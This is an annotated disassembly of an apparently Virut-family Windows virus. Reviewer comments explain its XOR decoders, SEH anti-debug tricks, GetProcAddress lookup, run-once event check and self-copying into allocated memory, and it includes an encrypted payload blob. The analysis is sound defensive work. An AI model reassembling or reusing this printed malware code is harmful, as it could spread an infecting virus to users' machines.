0B831A3B0h dd 63E9BC80h, 0D5DCFECh, 850C9B7Ah, 108D3955h, 8B302413h dd 0C3E32704h, 0E261FC5Fh, 9719D060h, 0FECC6DF9h, 11847F8Ch dd 2A933B11h, 3F6FABD2h, 66E5CCDBh, 0E3A552E4h, 82FBC9FEh dd 49512811h, 0FF24F3F7h, 45D52E57h, 8D93C5D3h, 5BCCCE96h dd 0FF03F1CFh, 9792876Ah, 0BAAC1E28h, 0F96C8344h, 6455C757h dd 786ED0C3h, 0BB2A3516h, 4BC85D19h, 22CFF2AFh, 4DF6120Ch dd 0ECA33658h, 79F0BCF5h, 0F0889007h, 9530A728h, 7E21D933h dd 524A8CE3h, 0E3EFADA7h, 
0FD76EA34h, 0BD47FB02h, 0E0911411h dd 0EF6969B4h, 4CA2A1Ch, 0C553631Ch, 14056C49h, 18A02839h dd 2A295823h, 44BC2CA1h, 5FDB0DE1h, 70D87427h, 6E2EA1AFh dd 9C1A878Bh, 473EE27Ah, 4D4183EAh, 8534696h, 7D6DDFEEh dd 0BA2D2607h, 6B12C818h, 0E8AD1996h, 9EF63744h, 13AC0CD9h dd 0FD788287h, 0EB7D759h, 1C21C417h, 3AB33F32h, 114A69FBh dd 8728A0A9h, 0D222627Dh, 9DC87DBAh, 0D1A75897h, 0EDBA9F55h dd 177A3054h, 0A3B3D6F6h, 83D1AA13h, 48B580DFh, 544BFED2h dd 0C0F2334Fh, 0AB50CFABh, 53ACD2B8h, 66AAD76h, 0DF9996D1h dd 0E85DE361h, 427B739Ch, 5DE6661Eh, 0B7E78728h, 18B78A5h dd 1F980AAFh, 3EED609Eh, 0C6CFDD8Ch, 0D177E364h, 0A87B9E6Fh dd 312A3136h, 9F1AFCFAh, 15B0534Bh, 937410E7h, 4BE2BC29h dd 0FB483B87h, 59E994FCh, 629D1394h, 0C936EDEDh, 109F0340h dd 6C6DD4B3h, 8007953Eh, 41B30385h, 0A367D8EDh, 0BD4510BEh dd 9B07FF2Fh, 0EAE91633h, 0FB8211CDh, 0A950D2AFh, 162D141Ah dd 0FBC04E41h, 13811404h, 0D7059E5h, 53328C7Fh, 0E1694AFEh dd 0BAA99053h, 793CCABDh, 0E04F230Ah, 1807616Eh, 0E47A08FBh dd 0A21B8D9Ah, 0B85CA26Dh, 274789E1h, 64DD4E43h, 71411A96h dd 0A027283Dh, 416751Eh, 0F10B26D2h, 5A4E3210h, 6361D3E1h dd 0A0F45528h, 44B67E6Ah, 52A69AE7h, 0B7B92B38h, 0F64FD78Dh dd 0E9EA5764h, 27CED11h, 9A4EC766h, 2E499E29h, 0BABFB0BCh dd 7AF46672h, 24EED3C8h, 6E00727Eh, 0E369F6DBh, 0B2E51CA5h dd 0A493440h, 0CE1241DEh, 709DA147h, 0F6F3631h, 0EA93449Bh dd 6D35AB3Eh, 244688EAh, 9D23B024h, 0F8724B18h, 0D995F186h dd 279E2032h, 8A1AFD2Fh, 0AD5CD448h, 626F2D21h, 7CF668FBh dd 3CDF4B81h, 0F6A99490h, 0D666290Ah, 2BB13EB3h, 20652B10h dd 7B8CDCh, 0C0EF086Eh, 0A1B36327h, 0F22DAF0Fh, 48A94650h dd 0EE6F5B5Fh, 210C267Ch, 197606A2h, 0EF74395Ah, 0D5F03C6Dh dd 0DDD54E58h, 0FA8B5F6Bh, 0F67C6891h, 78856368h, 0BEF5DED2h dd 8146BB89h, 679AC049h, 7E59A0C4h, 8D072602h, 3DBC81Bh dd 99138591h, 0C4E170CEh, 60D4C197h, 7BC54924h, 6283B730h dd 0AF6B1A9Ch, 0BEA76B34h dd 584DE7A8h, 59CD0AE4h, 0F73BEAF7h, 0A65FC28Ch, 92E73F1h dd 993922DDh, 79E6FECCh, 0E267D9D5h, 7C00D3FFh, 4926FAEDh dd 4F29AB86h, 7695ACABh, 93E038D4h, 8DEB6D44h, 38ABF295h dd 
0A59A0496h, 0B9AD2F02h, 0FA6DF657h, 0A8B1A58h, 0C1DA1EEEh
                dd 730547AAh, 12B1988Fh, 8F845CB0h, 0B1C70968h, 0D477CE49h
                dd 5546E872h, 0EF89CB25h, 9631A22Bh, 0A94A7134h, 0D27B9747h
                dd 46D6F6E3h, 3D77E9C6h, 940D7F64h, 2BC94822h, 0E9184639h
                dd 0A697417Eh, 94E016EBh, 7FB5D6Fh, 0D112C0D1h, 6E286958h
                dd 75A857B8h, 0CB6E06D3h, 4E97169h, 7B0197E3h, 0EC7A84B1h
                dd 0DBCC0D5Eh, 36BD4B05h, 0C3304F22h, 1D911F10h, 74FB8951h
                dd 0C652278h, 0A504F4D7h, 4DC61DFDh, 46B4AEDBh, 0C0D9B8Eh
                dd 2BCC713Eh, 8AAB1DADh, 0B0B4161Eh, 502CB499h, 14E25465h
                dd 0FD1EBED0h, 180C818Bh, 7BA27EE5h, 66AD55E7h, 0D6CE7067h
                dd 0D5E5DE27h, 0DDC55325h, 0DE130165h, 536F70A2h, 3B54D1C3h
                dd 0BBAD3B2Dh, 709CE2ABh, 0B794F0FEh, 9C15A82Ch, 32BBF52Ah
                dd 0E883B3C0h, 5EE7F156h, 0F785DFECh, 48037582h, 74140B3Ch
                dd 98E2AD8Ah, 30C5CFC7h, 0E2B3ADC3h, 0F3F16370h, 53B7DD52h
                dd 499C9517h, 3A830CD9h, 2FA60420h, 621D30A1h, 80h dup(0)
; ---------------------------------------------------------------------------
; Stub: sets up a frame, then two calls in a row. sub_31432C1B never returns
; here (it ends in `jmp ecx`), so `call sub_31432CA8` is not reached by
; fall-through. Its address is the return address of the first call, and
; sub_31432C1B turns exactly that stack slot into the handler field of an SEH
; record. The three instructions after the second call rebuild ebp from the
; SEH record at fs:0 (record + 8 is where `push ebp` below stored the caller's
; ebp) and rejoin sub_31432C1B at loc_31432C6A.
; NOTE(review): sub_31432CA8 pops its return address (the address of
; `mov ebp, fs:0`) into offset 0B8h of a structure taken from its stack, which
; is the Eip slot if that structure is the x86 CONTEXT - so this path looks
; like "fault, then resume here"; confirm under a debugger.
                push    ebp
                mov     ebp, esp
                call    sub_31432C1B
                call    sub_31432CA8
                mov     ebp, fs:0
                add     ebp, 8
                jmp     loc_31432C6A

; =============== S U B R O U T I N E =======================================
; Installs an SEH record on the stack, makes two calls through dword_3142808C
; with 10 and 9 pushed dwords, then XORs 243Ch bytes in place with 0D9h and
; jumps to the start of that region.
; NOTE(review): the listing tags dword_3142808C as LoadLibraryA, which takes a
; single parameter; the argument counts here do not fit. Presumably the calls
; are expected to fault or misbehave under analysis - not established here.

sub_31432C1B    proc near               ; CODE XREF: UPX2:31432C03p
                push    dword ptr fs:0          ; previous SEH head; with the return address above it
                mov     fs:0, esp               ; this forms {next, handler} and becomes the new head
                xor     ebx, ebx
                push    ebx
                push    ebx
                push    100h
                push    ebx
                push    ebx
                push    ebx
                push    ebx
                push    10h
                push    80000000h
                push    100h
                call    ds:dword_3142808C ; LoadLibraryA
                xor     ebx, ebx
                push    4000h
                push    ebx
                push    ebx
                push    4
                push    ebx
                push    80000000h
                push    ebx
                push    80000000h
                push    ebx
                call    ds:dword_3142808C ; LoadLibraryA

; Decode loop. ecx = address of the `pop ecx` below + 46h (subtracting
; 0FFFFFFBAh adds 46h), edi = 243Ch bytes, key = low byte of ebx = 0D9h.
; NOTE(review): by the listing's addresses the region starts at the byte shown
; as `align 2` right after sub_31432CA8, so the code that follows that routine
; is what gets decoded - confirm against the binary.
loc_31432C6A:                           ; CODE XREF: UPX2:31432C16j
                call    $+5
                pop     ecx                     ; ecx = address of this instruction
                sub     ecx, 0FFFFFFBAh
                xor     edi, edi
                or      edi, 243Ch              ; byte count
                mov     ebx, 0D9h               ; XOR key (bh = 0)
                push    ecx                     ; remember the region start for the final jmp

loc_31432C84:                           ; CODE XREF: sub_31432C1B+79j
                xchg    al, [ecx]               ; fetch the byte (memory briefly holds old al)
                xor     ax, bx                  ; al ^= 0D9h; ah ^= 0
                mov     [ecx], al               ; store the decoded byte
                add     ecx, 1
                sub     edi, 1
                cmp     edi, 0
                jnz     short loc_31432C84
                pop     ecx                     ; region start
                mov     esp, fs:0               ; back to the SEH record installed above
                pop     dword ptr fs:0          ; unlink it
                leave                           ; relies on ebp set by the stub (frame or record + 8)
                jmp     ecx                     ; continue in the decoded region
sub_31432C1B    endp

; ---------------------------------------------------------------------------
                align 4

; =============== S U B R O U T I N E
; =======================================
; Helper entered through the `call sub_31432CA8` that follows
; `call sub_31432C1B`. That call instruction's address is what sub_31432C1B
; leaves in the handler slot of its SEH record. The routine takes the dword at
; [esp+10h] as a pointer, pops its own return address into offset 0B8h of the
; pointed-to structure and returns eax = 0.
; NOTE(review): with the extra return address pushed by that call, [esp+10h]
; lines up with an exception handler's CONTEXT argument, and 0B8h is the Eip
; field of the x86 CONTEXT; returning 0 would then resume the thread at the
; instruction after the call - confirm.

sub_31432CA8    proc near               ; CODE XREF: UPX2:31432C08p

arg_C           = dword ptr  10h

                mov     ecx, [esp+arg_C]
                xor     eax, eax
                pop     dword ptr [ecx+0B8h]    ; also removes the return address, so retn uses the next slot
                retn
sub_31432CA8    endp ; sp-analysis failed

; ---------------------------------------------------------------------------
                align 2
; Position-independent start-up code. `call $+5` gives the code its own
; address; all later [ebp+40xxxxh] operands are relative to ebp = that
; address - 401006h. The code then looks for a loaded PE image and searches
; its export names for "GetProcAddress".
                call    $+5
                mov     eax, [esp]              ; eax = address of this instruction
                test    dword ptr [eax+242Bh], 80000000h ; flag dword, later addressed as [ebp+403431h]
                mov     [eax+29ACh], ebx        ; save ebx (slot later read as [ebp+4039B2h])
                mov     ebx, [esp+4]            ; dword that was on top of the stack at entry
                jz      short loc_31432D01      ; bit 31 clear: use that dword as the scan seed
; Bit 31 set: derive the seed from five stored bytes at [eax+242Fh]. If the
; first is 0E8h, the dword after it is added to ebx and the result is treated
; as a 2-byte opcode followed by a pointer; otherwise the dword at
; [eax+2431h] is used as that pointer directly.
; NOTE(review): this has the shape of following a saved `call rel32` into a
; `jmp [mem]` thunk, versus a saved `call [mem]`, to recover an imported
; function's address - an interpretation, not shown by this listing.
                cld
                pop     ecx                     ; drop the address pushed by call $+5
                mov     [eax+29B0h], esi        ; save esi
                mov     [eax+29B4h], edi        ; save edi
                cmp     byte ptr [eax+242Fh], 0E8h
                jnz     short loc_31432CF8
                add     ebx, [eax+2430h]
                mov     ebx, [ebx+2]
                push    dword ptr [ebx]
                jmp     short loc_31432D00
; ---------------------------------------------------------------------------

loc_31432CF8:                           ; CODE XREF: UPX2:31432CE9j
                mov     ebx, [eax+2431h]
                push    dword ptr [ebx]

loc_31432D00:                           ; CODE XREF: UPX2:31432CF6j
                pop     ebx                     ; ebx = dword read through the pointer

loc_31432D01:                           ; CODE XREF: UPX2:31432CD2j
                push    ebp
                xchg    eax, ebp                ; ebp = address obtained from call $+5
                sub     dword ptr [esp+4], 1CBBh ; lower the slot presumably used by the final retn
                and     ebx, 0FFFFF000h         ; round the seed down to a 4 KiB boundary
                sub     ebp, 401006h            ; ebp = delta for the [ebp+40xxxxh] operands
                mov     edi, [esp+4]
                lea     esi, [ebp+40343Ch]
                mov     ecx, 0
                rep movsb                       ; count is 0 as listed, so nothing is copied

; Walk downward in 100h steps until offset 4Eh holds 'This' (73696854h as a
; little-endian dword) and the word at base + [base+3Ch] is 'PE' (4550h).
; NOTE(review): 4Eh is where the usual DOS-stub message text begins, so only
; images carrying that stub are recognised. Apart from a match, the loop only
; ends when ebx reaches 0.
loc_31432D28:                           ; CODE XREF: UPX2:31432D44j
                cmp     dword ptr [ebx+4Eh], 73696854h
                jnz     short loc_31432D3E
                mov     eax, [ebx+3Ch]          ; e_lfanew
                lea     eax, [eax+ebx]          ; eax -> NT headers
                cmp     word ptr [eax], 4550h
                jz      short loc_31432D46

loc_31432D3E:                           ; CODE XREF: UPX2:31432D2Fj
                sub     ebx, 100h
                jnz     short loc_31432D28

loc_31432D46:                           ; CODE XREF: UPX2:31432D3Cj
                mov     edx, [eax+78h]          ; NT headers + 78h: export directory RVA (PE32)
                add     edx, ebx                ; edx -> export directory
                mov     esi, [edx+20h]          ; AddressOfNames RVA
                mov     ecx, [edx+18h]          ; NumberOfNames
                add     esi, ebx
                push    ecx                     ; kept to turn "names left" into an index later

; Compare each export name against 0,'GetProcAddress',0 four bytes at a time.
; The first compare starts one byte before the name, so the preceding byte
; must be 0.
loc_31432D54:                           ; CODE XREF: UPX2:loc_31432D7Bj
                lodsd                           ; next name RVA
                add     eax, ebx
                cmp     dword ptr [eax-1], 74654700h ; 0,'Get'
                jnz     short loc_31432D7B
                cmp     dword ptr [eax+3], 636F7250h ; 'Proc'
                jnz     short loc_31432D7B
                cmp     dword ptr [eax+7], 72646441h ; 'Addr'
                jnz     short loc_31432D7B
                cmp     dword ptr [eax+0Bh], 737365h ; 'ess',0
                jz      short loc_31432D80

loc_31432D7B:                           ; CODE XREF: UPX2:31432D5Ej
                                        ; UPX2:31432D67j ...
; Instruction belonging to label loc_31432D7B: end of the export-name scan.
                loop    loc_31432D54            ; next name while ecx (names left) is not 0
                pop     ecx                     ; nothing matched: drop the saved name count
                pop     ebp
                retn
; ---------------------------------------------------------------------------
; Name matched. Convert the name index into the export's address through the
; ordinal and address tables of the export directory (edx) and keep it in esi.

loc_31432D80:                           ; CODE XREF: UPX2:31432D79j
                sub     [esp], ecx              ; saved NumberOfNames - names left = index of the match
                mov     esi, [edx+24h]          ; AddressOfNameOrdinals RVA
                pop     ecx                     ; ecx = name index
                add     esi, ebx
                movzx   eax, word ptr [esi+ecx*2] ; ordinal-table entry for that name
                mov     edi, [edx+1Ch]          ; AddressOfFunctions RVA
                add     edi, ebx
                mov     esi, [edi+eax*4]        ; function RVA
                add     esi, ebx                ; esi = address of the matched export
; The next three calls each skip a run of data bytes, so the pushed return
; address points at that data. The first two land on `push ebx` / `call esi`,
; which is encoded inside what IDA lists as `add ...` + `setalc` (the calls
; target label+2 and label+1); the third lands on sub_31432DDE, which starts
; with the same two instructions.
; NOTE(review): read as ASCII, the opcodes of the skipped "instructions" spell
; 'CloseHandle',0 then 'CreateEventA',0 then 'GetLastError',0. The rel8 values
; implied by the listed jump targets agree, but this was decoded by hand -
; confirm against the raw bytes. The short jumps inside these runs are string
; bytes, not branches, which is why they point into other instructions.
                call    near ptr loc_31432DA6+2
                inc     ebx
                insb
                outsd
                jnb     short near ptr loc_31432E04+2
                dec     eax
                popa
                outsb
                db 64h
                insb

loc_31432DA6:                           ; CODE XREF: UPX2:31432D97p
                add     gs:[ebx-1], dl
                setalc
                mov     [ebp+40353Ch], eax      ; result of the first lookup
                call    near ptr loc_31432DC2+1
                inc     ebx
                jb      short near ptr loc_31432E1D+1
                popa
                jz      short near ptr loc_31432E1D+4
                inc     ebp
                jbe     short near ptr loc_31432E23+1
                outsb
                jz      short near ptr loc_31432E01+2

loc_31432DC2:                           ; CODE XREF: UPX2:31432DB1p
                add     [ebx-1], dl
                setalc
                mov     [ebp+403540h], eax      ; result of the second lookup
                call    sub_31432DDE
                inc     edi
                db 65h
                jz      short near ptr loc_31432E1D+4
                popa
                jnb     short loc_31432E4C
                inc     ebp
                jb      short near ptr loc_31432E4C+1
                outsd
                jb      short $+2

; =============== S U B R O U T I N E =======================================
; Entered by the call above, so [esp] is the address of the data bytes that
; follow that call. Does the third lookup, then calls sub_31432E5C for an
; event handle. No handle: exit path. Handle and a non-zero result from the
; third-lookup pointer: call the first-lookup pointer, then exit path.
; Otherwise: decode 225Fh bytes with sub_31432E77 and continue at loc_31432E87.
; NOTE(review): if the three names are as decoded above, this is a run-once
; check on a named event (create, read the last error, close the handle when
; the event already existed) - hedged on that decoding.
; NOTE(review): the `lstrcatA` tag on `call esi` is the listing's own. esi was
; loaded from the export whose name matched the 'GetProcAddress' pattern, so
; the tag looks wrong - verify.

sub_31432DDE    proc near               ; CODE XREF: UPX2:31432DCCp

; FUNCTION CHUNK AT 31432E87 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 31432FC7 SIZE 0000013A BYTES

                push    ebx                     ; image base found by the scan
                call    esi ; lstrcatA
                mov     [ebp+403544h], eax      ; result of the third lookup
                call    sub_31432E5C            ; eax = result of the call through [ebp+403540h]
                test    eax, eax
                jz      short loc_31432E11
                push    eax                     ; presumably the argument for the call at loc_31432E0B
                call    dword ptr [ebp+403544h]
                test    eax, eax
                jnz     short loc_31432E0B
                lea     eax, [ebp+4011D2h]      ; start of the region to decode

loc_31432E01:                           ; CODE XREF: UPX2:31432DC0j
                mov     dl, [eax-1]             ; key byte stored just before the region

loc_31432E04:                           ; CODE XREF: UPX2:31432D9Fj
                call    sub_31432E77
                jmp     short loc_31432E87
; ---------------------------------------------------------------------------

loc_31432E0B:                           ; CODE XREF: sub_31432DDE+1Bj
                                        ; sub_31432DDE+136j ...
                call    dword ptr [ebp+40353Ch] ; first-lookup pointer

; Exit path. If bit 31 of the flag dword is set, five stored bytes are written
; to the address in [esp+4] (the slot `retn` below consumes if the stack is
; balanced here) and ebx/esi/edi are reloaded from the slots the start-up code
; saved them in.
loc_31432E11:                           ; CODE XREF: sub_31432DDE+10j
                test    dword ptr [ebp+403431h], 80000000h
                jz      short loc_31432E3B

loc_31432E1D:                           ; CODE XREF: UPX2:31432DB7j
                                        ; UPX2:31432DBAj ...
                lea     esi, [ebp+403435h]

loc_31432E23:                           ; CODE XREF: UPX2:31432DBDj
                mov     edi, [esp+4]
                movsb
                movsd                           ; 1 + 4 bytes copied
                mov     ebx, [ebp+4039B2h]
                mov     esi, [ebp+4039B6h]
                mov     edi, [ebp+4039BAh]

loc_31432E3B:                           ; CODE XREF: sub_31432DDE+3Dj
                pop     ebp
                retn
sub_31432DDE    endp

; ---------------------------------------------------------------------------
; Helper that is called but returns with `jmp edx`, leaving 8 dwords (20h
; bytes) on the caller's stack; sub_31432E5C removes them with `add esp, 20h`.
; NOTE(review): IDA lost sync here. `db 8Bh` + `les ebp, [edx+0]` are the
; bytes 8B C4 6A 00, which decode as `mov eax, esp` / `push 0` (by hand -
; confirm). Read that way the code pushes five dwords (40001h, 0, 0, 0, 0),
; then a three-dword record {0Ch, pointer to those five dwords, 0}, and
; returns the record's address in eax. That is the shape of a
; SECURITY_ATTRIBUTES pointing at a security descriptor with revision 1,
; control 4 and four null pointers - unconfirmed.

loc_31432E3D:                           ; CODE XREF: sub_31432E5C+2p
                                        ; sub_31432DDE:loc_31433046p
                pop     edx                     ; return address, used by `jmp edx` below
                push    0
                push    0
                push    0
                push    0
                push    40001h
; ---------------------------------------------------------------------------
                db 8Bh
; ---------------------------------------------------------------------------

loc_31432E4C:                           ; CODE XREF: UPX2:31432DD6j
                                        ; UPX2:31432DD9j
                les     ebp, [edx+0]
                push    eax
                push    0Ch
                mov     eax, esp
                jmp     edx
; ---------------------------------------------------------------------------
aVt_3           db 'VT_3',0
                align 4

; =============== S U B R O U T I N E =======================================
; Calls the pointer at [ebp+403540h] with four arguments: the record built by
; loc_31432E3D, 0, 0 and a name string. Returns that call's result in eax.
; NOTE(review): by the listing's addresses [ebp+4011A1h] is aVt_3 ('VT_3'),
; and the argument order fits CreateEventA(attributes, manual-reset = 0,
; initial state = 0, name) - confirm.

sub_31432E5C    proc near               ; CODE XREF: sub_31432DDE+9p
                                        ; UPX2:loc_31433B01p
                xor     ecx, ecx
                call    loc_31432E3D            ; eax -> record on the stack
                lea     edx, [ebp+4011A1h]      ; name string
                push    edx
                push    ecx                     ; 0
                push    ecx                     ; 0
                push    eax
                call    dword ptr [ebp+403540h] ; second-lookup pointer
                add     esp, 20h                ; drop the 8 dwords left by loc_31432E3D
                retn
sub_31432E5C    endp ; sp-analysis failed

; =============== S U B R O U T I N E =======================================
; In-place XOR of 225Fh bytes starting at eax. dl is the starting key; after
; each byte the key is increased by its starting value (kept in dh), wrapping
; at 8 bits.

sub_31432E77    proc near               ; CODE XREF: sub_31432DDE:loc_31432E04p
                                        ; sub_31434C4B+25Bp
                mov     dh, dl                  ; step = starting key
                mov     ecx, 225Fh              ; byte count

loc_31432E7E:                           ; CODE XREF: sub_31432E77+Cj
                xor     [eax], dl
                inc     eax
                add     dl, dh
                loop    loc_31432E7E
                retn
sub_31432E77    endp

; ---------------------------------------------------------------------------
; NOTE(review): by the listing's addresses this byte is the one that
; `mov dl, [eax-1]` at loc_31432E01 reads as the key, and loc_31432E87 is
; where [ebp+4011D2h] points. No visible branch reaches this instruction, so
; it is probably a data byte (5Eh) rather than code - inferred, confirm.
                pop     esi
; START OF FUNCTION CHUNK FOR sub_31432DDE

loc_31432E87:                           ; CODE XREF: sub_31432DDE+2Bj
                and     dword ptr [ebp+401580h], 0
                and     dword ptr [ebp+401584h], 0
                and     dword ptr [ebp+401588h], 0 ; three dwords cleared
                mov     eax, [ebp+403431h]      ; flag dword
                xor     ecx, ecx
                push    1
                mov     cl, 20h
                pop     dword ptr [ebp+40397Eh] ; start value 1

loc_31432EAE:                           ; CODE XREF: sub_31432DDE+E0j
                xor     edx, edx
                shr     eax, 1
                setb    dl
                shl     dl, 3
                add     [ebp+40397Eh], edx      ; add 8 for every set bit of the flag dword
                loop    loc_31432EAE            ; 20h iterations
                push    edi
                mov     byte ptr [ebp+401303h], 1
                mov     [ebp+403548h], esi      ; keep the export address found at loc_31432D80
; sub_31433241 is not visible in this part of the listing. It is handed
; esi -> [ebp+4015BBh], edi -> [ebp+403558h] and cl = 1Eh.
; NOTE(review): the pointers called below through [ebp+403594h],
; [ebp+4035C8h] and [ebp+4035BCh] all fall inside 1Eh dwords starting at
; [ebp+403558h], so it presumably fills that table - TODO confirm.
                lea     esi, [ebp+4015BBh]
                xor     ecx, ecx
                lea     edi, [ebp+403558h]
                mov     cl, 1Eh
                call    sub_31433241
                pop     edi
                call    dword ptr [ebp+403594h]
                shr     eax, 1Fh                ; keep only bit 31 of the result
                jz      loc_31432FC7            ; bit clear: continue in the second chunk
; NOTE(review): a sign-bit test on a returned value like this is the usual
; platform split on a version query; which API sits at [ebp+403594h] is not
; shown here.
                mov     eax, [edi+14h]          ; sixth dword of the table edi points to (edi last set at loc_31432D80)
                push    40h
                add     eax, ebx
                push    8001000h
                mov     [ebp+403550h], eax      ; kept as a callable pointer
                push    69CEh
                push    0
                call    dword ptr [ebp+4035C8h] ; arguments as pushed: 0, 69CEh, 8001000h, 40h
                test    eax, eax
                jz      loc_31432E0B
                xchg    eax, edi                ; edi = returned address
                lea     esi, [ebp+401000h]
                mov     ebp, edi
                mov     ecx, 0A74h
                sub     ebp, 401000h            ; rebase ebp onto the copy
                lea     edx, [ebp+401283h]
                rep movsd                       ; copy 0A74h dwords to the returned address
                jmp     edx                     ; continue inside the copy
; END OF FUNCTION CHUNK FOR sub_31432DDE
; ---------------------------------------------------------------------------
; NOTE(review): by the listing's addresses, offset 283h of the copied range
; corresponds to the instruction below, so this appears to be where execution
; resumes inside the copy - confirm. The pointer at [ebp+403550h] is called
; four times with 10003h, 10000h, 10001h and 1000Ah as the last value pushed;
; what those values select is not established by this listing.
                sub     esp, 20h
                mov     edi, esp
                push    8
                xor     eax, eax
                pop     ecx
                lea     edx, [ebp+401A3Dh]
                rep stosd                       ; zero 8 dwords on the stack
                mov     edi, esp
                mov     [edi+10h], edx
                inc     byte ptr [edi+1Ch]
                push    edi
                push    10003h
                call    dword ptr [ebp+403550h]
                add     esp, 20h
                test    eax, eax
                jz      loc_31432E0B
                xchg    eax, edi
                push    0
                push    1
                push    80000400h
                push    10000h
                call    dword ptr [ebp+403550h]
                test    eax, eax
                jz      loc_31432E0B
                push    0
                push    eax
                push    40000h
                push    0
                shr     eax, 0Ch
                push    edi
                push    1
                push    eax
                push    10001h
                call    dword ptr [ebp+403550h]
                push    1000Ah
                call    dword ptr [ebp+403550h]
                call    sub_31432FB7
                jmp     loc_31432E0B

; =============== S U B R O U T I N E =======================================
; As listed, ecx is always 1 at the jecxz, so the branch is never taken and
; the routine loops, calling the pointer at [ebp+4035BCh] with argument 0Ah
; each time.

sub_31432FB7    proc near               ; CODE XREF: UPX2:31432FADp
                                        ; sub_31432FB7+Dj
                push    1
                pop     ecx
                jecxz   short locret_31432FC6
                push    0Ah
                call    dword ptr [ebp+4035BCh]
                jmp     short sub_31432FB7
; ---------------------------------------------------------------------------

locret_31432FC6:                        ; CODE XREF: sub_31432FB7+3j
                retn
sub_31432FB7    endp

; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_31432DDE
; This chunk continues past the end of the visible listing.
; NOTE(review): same inline-data trick as above. The five one-byte
; "instructions" after the call read as ASCII 'NTDLL', and the first byte of
; `add bh, bh` is the terminating 0. Re-synchronised at loc_31432FDE+1, the
; bytes up to `leave` appear to be `call dword ptr [ebp+403588h]`,
; `lea esi, [ebp+disp32]` and `xor ecx, ecx` - decoded by hand, confirm.

loc_31432FC7:                           ; CODE XREF: sub_31432DDE+10Fj
                cmp     dword ptr [ebp+403570h], 0
                jz      loc_31432E0B
                call    near ptr loc_31432FDE+1
                dec     esi
                push    esp
                inc     esp
                dec     esp
                dec     esp

loc_31432FDE:                           ; CODE XREF: sub_31432DDE+1F6p
                add     bh, bh
                xchg    eax, ebp
                mov     ds:0B58D0040h, dh
                jnb     short near ptr loc_31432FFB+5
                inc     eax
                add     [ebx], dh
                leave
                lea     edi, [ebp+4035D0h]      ; first dword after the 1Eh-entry table at [ebp+403558h]
                mov     cl, 0Bh
                xchg    eax, ebx
                call    sub_31433241

loc_31432FFB: ;
CODE XREF: sub_31432DDE+209j cmp dword ptr [ebp+4035F8h], 0 jz loc_31432E0B mov eax, [ebp+4035D4h] push dword ptr [eax+1] pop dword ptr [ebp+403395h] mov eax, [ebp+4035E8h] push dword ptr [eax+1] pop dword ptr [ebp+4033E2h] mov eax, [ebp+4035D8h] push dword ptr [eax+1] pop dword ptr [ebp+4033E9h] mov ecx, [ebp+4035DCh] jecxz short loc_31433046 push dword ptr [ecx+1] pop dword ptr [ebp+4033F6h] loc_31433046: ; CODE XREF: sub_31432DDE+25Dj call loc_31432E3D lea edi, [ebp+40364Eh] mov ecx, edi push 0 neg cl push dword ptr [eax+4] and ecx, 3 push 40h add edi, ecx push edi push 0 push 18h lea esi, [ebp+40159Fh] mov ecx, 1Ch mov edx, esp lea eax, ds:0FFFFFFFEh[ecx*2] stosw lea eax, ds:0[ecx*2] stosw lea eax, [edi+4] stosd xor ah, ah loc_3143308B: ; CODE XREF: sub_31432DDE+2B0j lodsb stosw loop loc_3143308B push 0 push 69CEh mov ecx, esp push 0 mov eax, esp push 0 push 8000000h push 40h push ecx push edx push 0Eh push eax call dword ptr [ebp+4035E0h] pop eax add esp, 40h push 69CEh mov edx, esp push 0 mov ecx, esp push 40h push 0 push 2 push edx push 0 push 69CEh push 0 push ecx push 0FFFFFFFFh push eax call dword ptr [ebp+4035E4h] pop edi pop ecx test edi, edi jz loc_31432E0B lea esi, [ebp+401000h] mov ecx, 0A74h mov ebp, edi rep movsd sub ebp, 401000h lea eax, [ebp+40144Ch] jmp eax ; END OF FUNCTION CHUNK FOR sub_31432DDE ; --------------------------------------------------------------------------- db 8Dh, 95h, 0E0h db 18h db 40h, 0, 52h db 0FFh db 95h, 9Ch, 35h db 40h ; @ align 2 dw 16E8h db 0 db 2 dup(0), 4Ch aOokupprivilege db 'ookupPrivilegeValueA',0 db 50h, 0FFh, 95h dd 403548h, 354C8589h, 54500040h, 0FF6A206Ah, 35EC95FFh dd 0C0850040h, 963F755Fh, 5656026Ah, 16AD48Bh, 11E852h dd 65530000h, 75626544h, 69725067h, 656C6976h, 56006567h dd 354C95FFh, 0C48B0040h, 50565656h, 95FF5756h, 4035D0h dd 5710C483h, 353C95FFh, 6A0040h, 95FF026Ah, 403570h, 128B9h dd 0E12B9700h, 54240C89h, 0AC95FF57h, 33004035h, 3CA583F6h dd 4036h, 95FF5754h, 4035B0h, 5C74C085h, 4FE8346h, 74FFEE72h 
    ; Continuation of a byte run that IDA left undisassembled. The dwords embed
    ; table offsets such as 4035A8h, 403568h and 40353Ch, so this is most
    ; likely code that calls resolved pointers - re-disassemble before use.
    dd 6A0824h, 95FF2A6Ah, 4035A8h, 0DC74C085h, 43DE893h, 0C9330000h
    dd 3930E391h, 40363C85h, 81287500h, 0DAEC1h, 50545000h
    dd 50505156h, 6895FF53h, 85004035h, 0F7459C0h, 82474FFh
    dd 363C858Fh, 0ACE80040h, 53FFFFFDh, 353C95FFh, 98EB0040h
    dd 128C481h, 0FF570000h, 40353C95h, 0FBE5E900h, 498DFFFFh
    dd 58585800h, 29CE00h, 0D6500h, 3 dup(0)
    db 0

; =============== S U B R O U T I N E =======================================
; sub_31433241 - fill a pointer table from a list of NUL-terminated names.
; In:  ebx = first argument passed to the resolver (a module value),
;      esi = current name, edi = next table slot, ecx = number of names.
; For each name it calls the resolver at [ebp+403548h] with (ebx, esi),
; stores the result at [edi] and advances esi past the name's NUL.
; Out: edi and esi advanced; eax = 0 (last byte loaded). The result is stored
; unchecked, so a failed lookup leaves whatever the resolver returned
; (callers in this listing test individual slots against 0).
; Note the loop re-enters at the routine's own entry (`loop sub_31433241`).
sub_31433241 proc near ; CODE XREF: sub_31432DDE+100p
; sub_31432DDE+218p ...
    push ecx                            ; keep the remaining count across the call
    push esi                            ; name
    push ebx                            ; module value
    call dword ptr [ebp+403548h]
    stosd                               ; table[i] = result
    pop ecx

loc_3143324C: ; CODE XREF: sub_31433241+Ej
    lodsb                               ; skip to the byte after the terminating NUL
    test al, al
    jnz short loc_3143324C
    loop sub_31433241
    retn
sub_31433241 endp

; ---------------------------------------------------------------------------
; Name table. The order matters: sub_31433241 stores one pointer per name, in
; this order, so slot N of a pointer table corresponds to the Nth name of the
; group it was called on. Defensive value: this run of API names, together
; with the section name '\BaseNamedObjects\W32_Virtu', is a static anchor
; for matching this body once it is unpacked.
